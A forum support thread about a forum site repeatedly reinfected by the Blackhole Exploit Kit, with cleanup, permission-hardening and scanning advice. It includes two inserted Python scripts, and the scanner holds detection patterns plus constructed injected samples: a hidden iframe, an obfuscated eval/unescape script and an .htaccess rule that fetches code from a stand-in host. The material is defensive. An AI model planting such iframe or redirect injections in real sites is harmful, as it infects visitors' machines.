We had a slightly outdated version of 1.something that got infected with a virus called the Blackhole Exploit. We removed it, upgraded the software to 2, and are continually running malware/virus scanners on our server. It keeps coming up clean. We even tried getting different brands of virus scanners and they come up clean.
However, some users are continually telling me their virus software is going off when visiting the site. Today I had a visitor tell me he plugged in a brand new computer, visited a couple of sites fine, hit ours and the virus software went off and crashed his browser; eventually it chewed his hard drive until the machine would no longer run at all.
I'm at a loss here. Not sure what to look for or where. But my server host is now suggesting I go through *every single possible line of code* in the website (literally millions and millions of lines) to look for something out of the ordinary. Since I don't spend a lot of time looking at Simple Machines code, I'm not sure I would notice what is out of the ordinary...
Any advice? Ideas? Suggestions?
First off, I would suggest trying to restore a clean backup that you know is not infected. If that's not possible, I would suggest backing up the web root directory and database, then clearing all the files from the SMF root directory and uploading a fresh version of the SMF files to see if that solves it.
Edit: An afterthought: if you're on shared hosting, it could be another hosting account on the server that is infected. I recently saw a very nasty installer virus take hold of a shared hosting environment; it affected multiple hosting accounts until it was properly removed.
Have you changed your passwords? I would suggest that, and uploading fresh files to override what you have currently. Also, I would ask your host if they know how this happened; it may be a server-side issue.
I did change all the passwords.
I did not do a fresh install - I upgraded from the 1.x to the latest 2.x. Then I customized the interface, so I suppose if I do a fresh install, all that will be lost?
Is it possible it's in the database? If so, how in the heck does one check for that?
Did I mention this is a VERY active forum, and I cannot lose the posts that are up there now.
I am on a dedicated server.
If you upload fresh files you will not lose your members/threads etc.; they are in the database. But you would lose your mods to the code, which can be reapplied.
I don't know if a virus can be in the database, but I doubt it is possible.
I had a problem with someone hacking my server, they got into all my sites and infected all my files in each site. In the end my hosting account had to be reset fully to how it was when I first got it. You may have to delete all files on your server. If you have more than one site you should check all the other sites. You should change your FTP passwords and see if that helps.
Quote from: slumdog10 on October 07, 2011, 04:27:41 PM
I had a problem with someone hacking my server, they got into all my sites and infected all my files in each site. In the end my hosting account had to be reset fully to how it was when I first got it. You may have to delete all files on your server. If you have more than one site you should check all the other sites. You should change your FTP passwords and see if that helps.
Who is your host?
You could have a 'true' virus like an installer or a rootkit; they can be quite nasty to remove. Have a look at installing and running the below; they're all free and can be removed afterwards.
AVG Free - anti-virus, if you don't already have one
Spybot - Anti spyware
Malwarebytes - Anti spyware
You should always use a few programs, as one alone never removes everything. Keep track of the names of anything they fix/heal or remove.
Thanks everyone..
So we do have AVG and, I believe, another piece of software scanning for stuff, and it comes up with nothing.
This is on a dedicated server, and there are no other sites on the box than this one.
Got an email this AM that one of my users' software was detecting last week that the site had "MBR viruses", and now he says his "Anti-Malware is catching a Fakesysdef trojan and the PDFjsc.rm exploit virus on every visit." Worse, he says his virus software started popping up *after* I upgraded Simple Machines to 2.0?
How can that be if the software we have on the server says it is clean?
The host is asmallorange.com.
I went through the site and deleted any files and folders that are not being used, and looked through a lot of code, but not all of it... and I don't see anything.
You have managed hosting? Ask your host to take a look into the issue; that is why you are paying them.
If you have managed hosting, then by all means get your host involved. Have a look at a program called HijackThis; it will tell you everything you need to know about running processes and services and point you to what could be causing your trouble.
Make sure you empty all temp folders.
Also, it's no harm to Google the virus/trojan name followed by 'remover', as if it's quite an annoying virus there's most likely a tool that removes it completely.
Let us know how you get on and what your host says.
My host is hosting24.com. I lost all my sites as it was impossible to search which ones had been tampered with.
Thanks Ziycon, that gives me something to tell the host to try...
Here's a message I just got from a user.. this is what his virus software is telling him:
" Danger: Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.
URL: 65.75.175.149/Home/index.php
Name: Blackhole Exploit Kit (type 1889)"
One problem with that: That is NOT the IP of my server or website? What the hell?
It looks like the virus is redirecting visitors to a malicious URL. Do a Google search for 'how to remove black hole exploit' and follow one or two of the results; this should point you in the right direction.
We thought we found it. It probably came from not having Simple Machines upgraded. We deleted it, did a ton of checking through files for anything that should not be there, and were just starting to feel confident that we killed it. Then some users started reporting again that their virus software keeps popping up on different parts of the site saying we have a virus, but then it shows the virus on their computer and an IP to another computer (same IP every time).
I'm losing visitors and traffic over this, and now there are people all over Facebook saying "Don't go to that site, it's full of viruses!". Not good.
It only affects SOME IE users.
Hosting company is not helping much. I may need to find a really qualified 3rd party to hunt it down and kill it once and for all. Then I got this email today, as I have another site running vBulletin:
"A recent vBulletin 4 (all versions, Suite & Classic) report indicated that if an installation had been hacked previously, the attacker could hide malicious code to allow a repeated attack. To further strengthen vBulletin's security - additional security checking and query cleaning were added to thwart such attacks."
Is it possible Simple Machines has NOT been patched sufficiently to stop this thing?
Please note I did a clean install last week. That stopped it for a few days, then it started up again.
Anyone know of a good 3rd party to help?
If another application you are running might have been hacked, it is possible they can use that as a backdoor into hacking your other applications. Make sure all apps you use are updated, and check for added files on your server and file last-modified dates/times.
Keep in mind that sometimes, attackers (automated or manual) will upload scripts on a webserver to allow a backdoor into the system. If you only just did an overwrite of the files and didn't do a full clearing of the website, it is likely that a backdoor script remains. There are two ways to check for this: look at every directory and compare with what should be in there, or do a "scorched earth" re-load. The latter is easier, but requires some preparation.
First, backup your database. It contains all the posts, members, and other forum data. You should be taking backups normally.
Next, if you allow uploads (avatars, attachments), you'll need to backup the attachments directory. If you do make backups of this, you will also need to check it for suspicious files.
Also, grab a copy of the Settings.php file. This holds connection information for your forum to talk to the database. Make sure to open it and check for any suspicious lines of code.
Now that you have the important things, delete the entire SMF directory. When this is done, upload the contents of the SMF install archive. Delete the install.php file and all the .sql files. Upload the backed-up Settings.php. If you made a backup of it, also upload the Attachments directory.
This should give you a stock SMF install with fully clean files.
If you have other website files on your server, you will need to check them in some way or another as well, or you could run into issues again.
It's extreme, but I would recommend backing up all sites and databases and then deleting all sites (flat files), then putting a temporary page in place for all sites. Now get users that are reporting virus warnings to visit this temporary page and see if they get a warning; if so, then it's not your websites and the server is infected.
You can then take it from there as the next course of action.
Quote from: 青山 素子 on November 01, 2011, 11:52:04 AM
Keep in mind that sometimes, attackers (automated or manual) will upload scripts on a webserver to allow a backdoor into the system. If you only just did an overwrite of the files and didn't do a full clearing of the website, it is likely that a backdoor script remains. There are two ways to check for this: look at every directory and compare with what should be in there, or do a "scorched earth" re-load. The latter is easier, but requires some preparation.
First, backup your database. It contains all the posts, members, and other forum data. You should be taking backups normally.
Next, if you allow uploads (avatars, attachments), you'll need to backup the attachments directory. If you do make backups of this, you will also need to check it for suspicious files.
Also, grab a copy of the Settings.php file. This holds connection information for your forum to talk to the database. Make sure to open it and check for any suspicious lines of code.
Now that you have the important things, delete the entire SMF directory. When this is done, upload the contents of the SMF install archive. Delete the install.php file and all the .sql files. Upload the backed-up Settings.php. If you made a backup of it, also upload the Attachments directory.
This should give you a stock SMF install with fully clean files.
If you have other website files on your server, you will need to check them in some way or another as well, or you could run into issues again.
That's what I did.. but we are still getting the virus warnings... so we've now looked through all the databases, and the only thing we found was a lot of HTML in the Simple Machines DB in the posts. It's an insane amount of posts to check, so it will take a while to see if any of them are malicious.
Just a thought: if you can write a script that strips HTML/PHP tags and run it on a copy of the database, install the stripped copy and see if the problem persists, it might tell you something useful.
http://php.net/manual/en/function.strip-tags.php
Quote from: Flavious on November 01, 2011, 02:23:17 PM
That's what I did.. but we are still getting the virus warnings... so we've now looked through all the databases, and the only thing we found was a lot of HTML in the Simple Machines DB in the posts. It's an insane amount of posts to check, so it will take a while to see if any of them are malicious.
What's one of the links causing the issue?
Normally, SMF won't print raw HTML from database posts.
Try using something like the query below first to get an idea of how many posts there are; you may be able to manually fix them. If the HTML tags are using BBCode, change the brackets to square ones.
SELECT id_msg, body FROM <prefix>_messages WHERE body LIKE '%<html%</html>%';
Still looking though the DB - thanks for all the suggestions/help!
Also, I've been in contact with AVG as most users complaining of the issue appear to be using this as their virus protection software. Here's their official response:
"Please accept our apologies due to the inconvenience caused in regard to the mentioned issue. We truly appreciate your time and actions taken in order to provide us with more information about this.
Unfortunately the detection was a false alarm. This means that the file or website is clean and virus-free, but AVG detects it as a virus due to an error in virus definitions. Unfortunately, false alarms do appear from time to time in every security software.
We checked the URL and didn't find any pop up or detection. The false detection was probably fixed in the previous AVG virus database update. Update your AVG and check the situation again."
So could it be that SEVERAL virus software providers are flagging us with false positives???
If different software is being used, I would say it is not a false positive.
Get all your AVG users to update their definitions, and if that fixes the issue for them, find out what other anti-virus software the other users having the problem are using and ask them to update their definitions. But it's very, VERY rare that multiple, or even two, anti-virus providers would create a false positive with a definition at the same time for the same 'virus'.
There's a virus going round that's spread via browsers. Can't remember the name, but there's a thread somewhere on the forum about it. If any of your members has it on their computer, it will keep re-infecting your forum.
I suppose that such a virus could exist, but the way it would work would be to cause the browser to exploit known security holes in the web site. Once you close up such holes, no problem for the site, except for infected browsers constantly pounding on your site trying to break in.
When will it become legal to kill all malware authors, wherever they are in the world?
If I get a few minutes, will try to find the thread that names the virus. Found some technical info on how it works, only some of which I understood.
Quote from: MrPhil on November 03, 2011, 09:59:23 AM
When will it become legal to kill all malware authors, wherever they are in the world?
I'd vote for such a law but obviously it's a pipe dream. ::)
I think a lot of our issues were coming from Google AdSense. Turned off all the Google ads, and like magic the problems stopped. Tried contacting Google every which way from Sunday; I get nothing from them. "Do no evil" indeed.
Had a new one today in that one user has links showing up on the SMF home page that are not there. As of yet, I can't duplicate it.
SMF was infected again. I just noticed that SMF wanted files upgraded for a security patch. I did that, and then I found JavaScript (theme.js) and an .htaccess file in the SMF directory that were infected. The .htaccess contained a command to download a .js file, and the theme.js file contained an iframe attack to download from zombie computers.
After the last infection, we did a clean install of SMF, reviewed EVERY file on the website, shut off a ton of functionality elsewhere on the website, deleted a ton of unused files on the website, changed all the passwords, and for about 1-2 weeks everything was fine.
Question: How the hell is this happening? Should I be looking at a new dedicated server manager? Should I be looking at ditching SMF? Is there something on my server that is moving around and re-infecting crap when it gets a chance? How the hell does this thing get permission to write to the htaccess and javascript files?
I appreciate the help so far.... We've lost 50% of our traffic to the site because of this issue. It's a very busy site with tons of traffic, and the growing chorus of people screaming because their entire hard drive was wiped out eats my guts out and has made it impossible for me to sleep for several days.
Thanks all.
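As an added example, not code from the thread or from SMF: the HTML-in-posts query a few posts up and the theme.js/.htaccess finding above can be triaged with the same heuristics. This Python script scans text (a dumped messages.body value, a theme file, an .htaccess) for injection indicators and classifies post bodies as BBCode, HTML or suspicious; the samples and the redirector.invalid hostname are constructed.

```python
import re
from typing import Dict, List, Tuple

# Broad indicators of injected content; a hit is something to review by hand in a
# copy of the file or post, not proof of compromise on its own.
INDICATORS = [
    ("raw_html_document", re.compile(r"<html\b", re.I)),
    ("script_tag", re.compile(r"<script\b", re.I)),
    ("iframe_tag", re.compile(r"<iframe\b", re.I)),
    ("hidden_iframe", re.compile(
        r"<iframe\b[^>]*(?:(?:width|height)\s*=\s*['\"]?0\b|visibility\s*:\s*hidden"
        r"|display\s*:\s*none)", re.I)),
    ("js_obfuscation", re.compile(r"\b(?:eval|unescape|String\.fromCharCode)\s*\(")),
    ("htaccess_external_redirect", re.compile(
        r"^\s*(?:Redirect(?:Match|Permanent|Temp)?|RewriteRule)\b.*\bhttps?://", re.I)),
    ("htaccess_conditional_redirect", re.compile(
        r"^\s*RewriteCond\s+%\{HTTP_(?:USER_AGENT|REFERER)\}", re.I)),
    ("htaccess_php_injection", re.compile(
        r"^\s*php_value\s+auto_(?:prepend|append)_file\b", re.I)),
]

# SMF stores posts as BBCode and only uses <br /> for line breaks, so any other
# HTML tag in a message body is unusual.
BBCODE_TAG = re.compile(r"\[/?[a-z]+(?:=[^\]]*)?\]", re.I)
HTML_TAG = re.compile(r"</?(?!br\b)[a-z][a-z0-9]*\b[^>]*>", re.I)


def scan_text(text: str) -> List[Tuple[str, int, str]]:
    """Return (indicator, 1-based line number, trimmed line) for each hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, lineno, line.strip()[:80]))
    return hits


def classify_post_body(body: str) -> str:
    """Triage one messages.body value: 'suspicious', 'html', 'bbcode' or 'plain'."""
    if scan_text(body):
        return "suspicious"
    if HTML_TAG.search(body):
        return "html"
    if BBCODE_TAG.search(body):
        return "bbcode"
    return "plain"


def report(samples: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each sample name to the sorted set of indicator names found in it."""
    return {name: sorted({hit[0] for hit in scan_text(text)}) for name, text in samples.items()}


# Constructed samples (not taken from the thread); hostnames use reserved TLDs.
SAMPLE_POST_BBCODE = "[b]Upgrade done[/b]<br />See [url=http://forum.example/index.php]here[/url]"
SAMPLE_POST_HTML = '<html><body><script>eval(unescape("%3c%69%66%72%61%6d%65"))</script></body></html>'
SAMPLE_THEME_JS = (
    "function smf_toggle() { return true; }\n"
    "document.write('<iframe src=\"http://redirector.invalid/x.php\" width=\"0\" height=\"0\"></iframe>');\n"
)
SAMPLE_HTACCESS = (
    "Options -Indexes\n"
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_USER_AGENT} .\n"
    "RewriteRule ^(.*)$ http://redirector.invalid/x.js [R=302,L]\n"
)
SAMPLES = {"post_bbcode": SAMPLE_POST_BBCODE, "post_html": SAMPLE_POST_HTML,
           "theme.js": SAMPLE_THEME_JS, ".htaccess": SAMPLE_HTACCESS}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        kind = classify_post_body(text) if name.startswith("post") else "file"
        print(f"== {name} ({kind})")
        for indicator, lineno, snippet in scan_text(text):
            print(f"   line {lineno}: {indicator}: {snippet}")
```

To run it over a real export, feed each messages.body row (or each file's contents) to classify_post_body and scan_text and review only the rows or files that come back with hits.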
Since you have lots of other code on your website (you say), it's possible that's where the attack is getting in. I know the standard line from SMF is "there are no known security exploits", and that may (or may not) be true, as long as you are at the latest SMF version (2.0.2). Since no one else seems to be complaining about such attacks, it's unlikely (though not impossible) that it's in the SMF software you're getting from this site. Removing SMF and using another forum probably isn't going to help you, in other words. Is your other site software homebrew or installed standard/commercial applications? Do other sites sharing your server (if any) also report security problems? Have you not only scrubbed your site of all code that you can't account for, but also scanned all PCs used for admin access for spyware and viruses? After doing that, have you changed all passwords (site manager, FTP, admin/privileged SMF accounts, etc.)? Don't forget that FTP sends passwords in plain text, so you might want to switch to secure FTP (SSL). Have you done a daily (or even twice daily) directory listing with file dates and sizes, to see what's being modified? You might try making all directories 555 and all files 444, except any that SMF or other applications need to write to on a regular basis (attachments, avatars, etc.). Only (temporarily) grant write permissions when you want to upload a theme or a mod.
I wish you the best in getting this cleaned up -- it sounds like someone is really determined to get you.
Quote from: MrPhil on December 26, 2011, 04:20:53 PM
Removing SMF and using another forum probably isn't going to help you, in other words. Is your other site software homebrew or installed standard/commercial applications?
There is one other application on the site that we wrote from scratch. We have checked every line of code in it, and had a third party check it as well. We've never had any problems there, no files have been written to in that directory, so I am reasonably sure it was not any of that code. Pretty simple app anyway, not much to it.
Quote
Do other sites sharing your server (if any) also report security problems?
It's a dedicated server.
Quote
Have you not only scrubbed your site of all code that you can't account for, but also scanned all PCs used for admin access for spyware and viruses?
Yes, we have scrubbed all outdated or unidentified files some time ago. The Macs and PCs used to do anything to the site are checked frequently; they were checked today, and all came up clean.
Quote
After doing that, have you changed all passwords (site manager, FTP, admin/privileged SMF accounts, etc.)?
This was done after the first infection. Still working on it now after this latest infection.
Quote
Have you done a daily (or even twice daily) directory listing with file dates and sizes, to see what's being modified? You might try making all directories 555 and all files 444, except any that SMF or other applications need to write to on a regular basis (attachments, avatars, etc.). Only (temporarily) grant write permissions when you want to upload a theme or a mod.
We talked about this today, and it is one option I think we will try - lock down everything so nothing can be written - except attachments and avatars... what else cannot be locked down? Or what all can I lock down without breaking Simple Machines?
Quote
I wish you the best in getting this cleaned up -- it sounds like someone is really determined to get you.
There is a possibility of one group doing this.. they have openly made it their goal to destroy my website for some time now. But I would need proof before I could take any kind of legal action or get the police involved. So far the only consistent factor has been Simple Machines.
Quote from: Flavious on December 26, 2011, 03:57:32 PM
SMF was infected again.
Not totally related, but I've noticed a persistent re-infection on one specific site I help manage that's on Dreamhost. The last time, I removed write permissions on all files and things still managed to become infected. Looking through using SSH, I found that a few files with another account as owner were in the website root. About the only thing I can determine after that is that their shared hosting servers aren't all that secure.
None of my other six plus SMF installs (mixed 1.1 and 2.0) have ever had an issue. I think it would be way too premature to blame the SMF software itself when there is no evidence of a systemic problem.
Quote from: Flavious on December 26, 2011, 06:21:20 PM
It's a dedicated server.
Okay, that's somewhat good. Do you have multiple domains on the server? What services are running and listening on ports? How updated are you on patches?
Are you using a commercial control panel package, or manually configuring things? How are you running PHP?
Keep in mind that "utility" web applications may also be an entry point. I once had a client who had a server intrusion. The attacker was using an old phpMyAdmin installation as a launching point. The client thought they had it blocked to outside IPs and thus didn't need to keep it updated, but mis-configured the server and left it open to the world.
Quote from: Flavious on December 26, 2011, 06:21:20 PM
Yes, we have scrubbed all outdated or unidentified files some time ago. The Macs and PCs used to do anything to the site are checked frequently; they were checked today, and all came up clean.
Some of the newer Windows-based password-stealers use rootkit techniques to hide themselves. Scan using a bootable CD antivirus tool. UBCD4Windows works and many AV companies offer a burnable ISO that will scan your system.
Quote from: Flavious on December 26, 2011, 06:21:20 PM
We talked about this today, and it is one option I think we will try - lock down everything so nothing can be written - except attachments and avatars... what else cannot be locked down? Or what all can I lock down without breaking Simple Machines?
If you want something a bit industrial-strength, look at AIDE (http://aide.sourceforge.net/). It's pretty awesome. There is also the much older Open Source Tripwire (http://sourceforge.net/projects/tripwire/), but it hasn't been significantly updated in some time.
I also encourage the use of Fail2ban (http://www.fail2ban.org/). It can be configured to examine various system logs and ban IPs found in those logs. I usually at the least have it watch SSH and FTP services.
In theory, you can make everything read-only. It is recommended at minimum to keep the cache directory and Settings.php writable. If you allow attachments or uploaded avatars, you'll need to set those as well.
Also, while you're locking things down, check all the files in every directory to see if they are supposed to be there. On that earlier infection on DreamHost I found a PHP-based shell tool hidden a few directories deep.
Quote from: Flavious on December 26, 2011, 06:21:20 PM
There is a possibility of one group doing this.. they have openly made it their goal to destroy my website for some time now. But I would need proof before I could take any kind of legal action or get the police involved. So far the only consistent factor has been Simple Machines.
While that might be possible, it really depends on the skills of those involved. Statistically, it's more likely there is some automated attack being done by a script kiddie than some targeted attack directly against you.
Also, as I noted earlier, there hasn't been any evidence of a systemic problem with SMF itself. With all the users, an active exploit would be noticed quickly from reports.
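To make "what can I lock down without breaking SMF" concrete, here is an added Python example (not from the thread or from SMF) that builds a dry-run chmod plan for an SMF root, keeping only cache/, Settings.php, attachments/ and avatars/ writable as advised above, and lists world-writable entries before and after. It assumes PHP runs as the file owner; the demo tree, its file names and modes are constructed.

```python
import os
import stat
import sys
from pathlib import Path

# Paths (relative to the SMF root) that SMF must write to during normal operation,
# per the advice in this thread: the cache dir, Settings.php and the upload dirs.
# Everything else is made read-only; grant write back only while installing a mod/theme.
DEFAULT_WRITABLE = ("cache", "Settings.php", "attachments", "avatars")

# Assumption: PHP runs as the file owner (suPHP/FastCGI style), so owner-write is
# enough for the writable set. If PHP runs as another user you need group
# ownership plus 0775/0664 there instead.
MODE_DIR_RO, MODE_FILE_RO = 0o555, 0o444
MODE_DIR_RW, MODE_FILE_RW = 0o755, 0o644


def is_under_writable(rel: Path, writable=DEFAULT_WRITABLE) -> bool:
    """True if rel is a writable entry or lies inside a writable directory."""
    return any(rel.parts[: len(Path(w).parts)] == Path(w).parts for w in writable)


def plan_permissions(root, writable=DEFAULT_WRITABLE):
    """Dry run: [(relative path, current mode, desired mode)] for each entry that
    should change. Symlinks are skipped because chmod would follow them."""
    root = Path(root)
    changes = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink():
            continue
        rel = path.relative_to(root)
        rw = is_under_writable(rel, writable)
        if path.is_dir():
            desired = MODE_DIR_RW if rw else MODE_DIR_RO
        else:
            desired = MODE_FILE_RW if rw else MODE_FILE_RO
        current = stat.S_IMODE(path.stat().st_mode)
        if current != desired:
            changes.append((rel.as_posix(), current, desired))
    return changes


def world_writable(root):
    """Entries anyone on the box can write to (the 666/777 cases the thread warns about)."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if not p.is_symlink() and stat.S_IMODE(p.stat().st_mode) & stat.S_IWOTH)


def apply_plan(root, changes):
    """Apply a plan from plan_permissions(); parents come first in the sorted order."""
    for rel, _current, desired in changes:
        os.chmod(Path(root) / rel, desired)


def build_demo_tree(base):
    """Constructed miniature SMF tree with deliberately sloppy modes (example only)."""
    base = Path(base)
    dirs = {"cache": 0o755, "attachments": 0o755, "avatars": 0o755,
            "Themes/default": 0o755, "Sources": 0o777}
    for rel in dirs:
        (base / rel).mkdir(parents=True)
    files = {"index.php": 0o666, "Settings.php": 0o644, "Sources/Load.php": 0o777,
             "Themes/default/theme.js": 0o644, "cache/data_x.php": 0o644,
             "attachments/1_abc": 0o644, ".htaccess": 0o666}
    for rel, mode in files.items():
        (base / rel).write_text("placeholder\n")
        (base / rel).chmod(mode)
    for rel, mode in dirs.items():   # set after writing so creation is not blocked
        (base / rel).chmod(mode)
    (base / "Themes").chmod(0o755)
    return base


def demo():
    """Lock down the demo tree; return (world-writable before, plan, world-writable after)."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        root = build_demo_tree(tmp)
        before = world_writable(root)
        changes = plan_permissions(root)
        apply_plan(root, changes)
        after = world_writable(root)
        for p in root.rglob("*"):        # restore so the temp dir can be removed
            if p.is_dir() and not p.is_symlink():
                p.chmod(0o755)
        return before, changes, after


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: smf_lockdown.py SMF_ROOT [--apply]")
        sys.exit(1)
    plan = plan_permissions(sys.argv[1])
    for rel, current, desired in plan:
        print(f"{rel}: {oct(current)} -> {oct(desired)}")
    print("world-writable now:", world_writable(sys.argv[1]))
    if "--apply" in sys.argv:
        apply_plan(sys.argv[1], plan)
```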
Quote
Okay, that's somewhat good. Do you have multiple domains on the server? What services are running and listening on ports? How updated are you on patches?
Are you using a commercial control panel package, or manually configuring things? How are you running PHP?
No just one domain.
Cpanel, very minimal.
OK, first learn what you're talking about: 'MBR viruses' = Master Boot Record = server's HDD, so no matter how much you clean your site you will be reinfected! Your host's issue to resolve that.
AVG Free: you've got more chance of knitting fog than that piece of **** doing the job.
Run Emsisoft Anti-Malware and Malwarebytes, then install the Kaspersky Internet Security 30-day trial to keep your own PC under control, as you could be the infection source if you are relying on AVG. Avira antimalware scanner is a decent free program to use afterwards. Don't run two together as they will conflict.
If SMF were the culprit, I'm sure more than you would be reporting this by now.
Just my 2pence worth. ;)
Quote from: Flavious on December 26, 2011, 07:15:47 PM
Quote
Okay, that's somewhat good. Do you have multiple domains on the server? What services are running and listening on ports? How updated are you on patches?
Are you using a commercial control panel package, or manually configuring things? How are you running PHP?
No just one domain.
Cpanel, very minimal.
What about server patches? I'm guessing you're on Linux?
cPanel's default settings aren't very good, so you might want to review that configuration as well.
Quote from: nightbre on December 26, 2011, 07:54:06 PM
OK, first learn what you're talking about: 'MBR viruses' = Master Boot Record = server's HDD, so no matter how much you clean your site you will be reinfected! Your host's issue to resolve that.
MBR viruses are not really all that common anymore. Especially with the whole NT stack, they tend to break things more than infect them. It is more likely there is a rootkit (http://en.wikipedia.org/wiki/Rootkit) involved, which is more difficult to detect.
Quote from: nightbre on December 26, 2011, 07:54:06 PM
AVG Free: you've got more chance of knitting fog than that piece of **** doing the job.
AVG's detection engine isn't bad, but their newest software packages have become very bloated. However, if you read, you'll see that the mention of AVG was from end users browsing the website. Rant about AVG all you like, but the people actually using it won't read that.
Quote from: nightbre on December 26, 2011, 07:54:06 PM
Run Emsisoft Anti-Malware and Malwarebytes, then install the Kaspersky Internet Security 30-day trial to keep your own PC under control, as you could be the infection source if you are relying on AVG. Avira antimalware scanner is a decent free program to use afterwards. Don't run two together as they will conflict.
Haven't heard of Emsisoft before. KAV and Avira have both been decent. However, for the Windows systems, a bootable scanner CD is the best option, as it will allow detection of items that may hide when Windows itself is running.
Quote from: nightbre on December 26, 2011, 07:54:06 PM
If SMF were the culprit, I'm sure more than you would be reporting this by now.
Yeah, probably. Isolated incidents are usually related to that specific server or website contents.
Kaspersky has a good bootable scanner that runs on Linux. You can download the ISO and burn it to CD, or also download the USB app that will create a bootable stick with the ISO. It will also configure your network adapter to update the signature file before the scan. The only negative I have found with it is that it has a problem configuring some wireless devices. If your only web access is wireless, there is a potential issue with updating the signature.
Quote
MBR viruses are not really all that common anymore. Especially with the whole NT stack, they tend to break things more than infect them. It is more likely there is a rootkit (http://en.wikipedia.org/wiki/Rootkit) involved, which is more difficult to detect.
Kaspersky do a good range of standalone apps and a rescue disk too which can be booted from; Avira also does one that can be booted from.
Quote
AVG's detection engine isn't bad, but their newest software packages have become very bloated. However, if you read, you'll see that the mention of AVG was from end users browsing the website. Rant about AVG all you like, but the people actually using it won't read that.
From my job's point of view (IT tech), systems with AVG, Norton and McAfee can report your system safe, but when scanned with another scanner, i.e. Malwarebytes/Emsisoft for instance, they suddenly start finding infections off the back of the other scanner. It's entirely up to the end user to decide how much security they wish to implement, but personally I would not rely on any of the 3 named alone. The Kaspersky suite or ESET would be a top choice for decent security, generally available for a reasonable price. Avira is my choice of free scanners, but I would also run a manual scan with Malwarebytes regularly too.
Another biggie that gets overlooked a lot is people don't update Flash, Java and Windows updates, which also leaves holes they needn't have. Browsers generally bug you to update, but Windows can be very out of date in some instances.
(overlaps busters post but was written when he posted)
Quote from: 青山 素子 on December 26, 2011, 06:39:38 PM
Quote from: Flavious on December 26, 2011, 06:21:20 PM
It's a dedicated server.
Okay, that's somewhat good.
Actually, that's bad in the sense that it rules out a common attack route. Dedicated server security can be better than shared, but if you or your host are lax, the bad guys still may be able to get in. It's just usually harder than on a shared server.
Quote
In theory, you can make everything read-only. It is recommended at minimum to keep the cache directory and Settings.php writable. If you allow attachments or uploaded avatars, you'll need to set those as well.
Settings.php should always be read-only, once you have the settings settled down. I see that the morons are still writing the timestamp of the last database error directly to the Settings.php, despite my telling them repeatedly that's a stupid thing to do. There is absolutely no need to rewrite Settings.php on a regular basis -- use a separate file for the database error timestamp (see my sig > Fixes). Users are still getting Settings.php emptied out, perhaps not as frequently as in SMF 1.x. Once you've got the settings right, lock down the file 444.
As for attachments, avatars, and such, you may just have to prevent uploads to those directories while you're getting the attacks sorted out. There's no real harm in making the directories read-only (555) for a while. Caching can probably be turned off with little impact on performance -- you may want to try that. Do you have any files or directories that are "world writable" (666 or 777)? Unless you absolutely need that for selected directories because PHP runs as a random user (not as owner or in your group), you should have more restrictive permissions (755 or at worst, 775). Check your higher level permissions (such as public_html/ or the equivalent) -- if they're 755 and lower level directories are 777, that could be letting the hacker in. Talk with your host about whether 750 would work for you (or just try it).
Quote
Also, while you're locking things down, check all the files in every directory to see if they are supposed to be there. On that earlier infection on DreamHost I found a PHP-based shell tool hidden a few directories deep.
Keep an eye out for "hidden" files (starting with a period) that may not show up in your host File Manager or FTP. Make sure you can see any (such as .htaccess). Also don't just "eyeball" file names -- hackers generally aren't dumb enough to give obvious names like "spreadInfection.php" to their files -- they'll be something important and official sounding, such as PermissionsCheck.php and the like. Compare your list of files to a fresh copy of SMF to make sure of what's supposed to be there. Also compare file sizes and last modified dates -- has a file been changed later than you can account for? An automated checking tool would be good for this (even better, doing an MD5 checksum on each file).
Quote
Quote from: Flavious on December 26, 2011, 06:21:20 PM
So far the only consistent factor has been Simple Machines.
While that might be possible, it really depends on the skills of those involved. Statistically, it's more likely there is some automated attack being done by a script kiddie than some targeted attack directly against you.
If SMF is the only "commercial" software you have, it may be the only one for which they have source and can find any vulnerabilities. It's always possible that they've found an entry that no one at SMF knows about. Just as likely, though, is that your host has a security problem of their own that is allowing the hacker to get in as "owner" and do whatever they want. Have you been looking at access logs to see who is in there, from what IP address? If they're bypassing the regular login process, even that may fail to reveal anything. I would definitely have your host monitoring all activity on your site, on the chance that someone is getting in through a back door.
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
Quote from: 青山 素子 on December 26, 2011, 06:39:38 PM
Quote from: Flavious on December 26, 2011, 06:21:20 PM
It's a dedicated server.
Okay, that's somewhat good.
Actually, that's bad in the sense that it rules out a common attack route. Dedicated server security can be better than shared, but if you or your host are lax, the bad guys still may be able to get in. It's just usually harder than on a shared server.
It's good in the fact that it eliminates a large portion of possible entry points. It also means that the user can take more action to find out the cause than if they were on a shared environment.
The whole trick to debugging and similar things like this troubleshooting is to divide up tasks and systemically remove them from consideration.
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
Settings.php should always be read-only, once you have the settings settled down. I see that the morons are still writing the timestamp of the last database error directly to the Settings.php, despite my telling them repeatedly that's a stupid thing to do.
I wouldn't call them morons. Anyway, the entire developer pool went through a turn-over not too long ago, so I'm fairly sure they were a bit more occupied with getting the product cleaned up and ready than fixing what is a silly but small issue - there were much bigger things to handle.
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
There is absolutely no need to rewrite Settings.php on a regular basis -- use a separate file for the database error timestamp (see my sig > Fixes). Users are still getting Settings.php emptied out, perhaps not as frequently as in SMF 1.x. Once you've got the settings right, lock down the file 444.
Save the preaching for the Bug Reports board or something. This topic is about trying to help a user determine why they are having issues on their website.
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
As for attachments, avatars, and such, you may just have to prevent uploads to those directories while you're getting the attacks sorted out. There's no real harm in making the directories read-only (555) for a while.
Agreed. If you can disable attachments and avatar uploads for a while, it would be useful to see if that has any effect.
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
Caching can probably be turned off with little impact on performance -- you may want to try that.
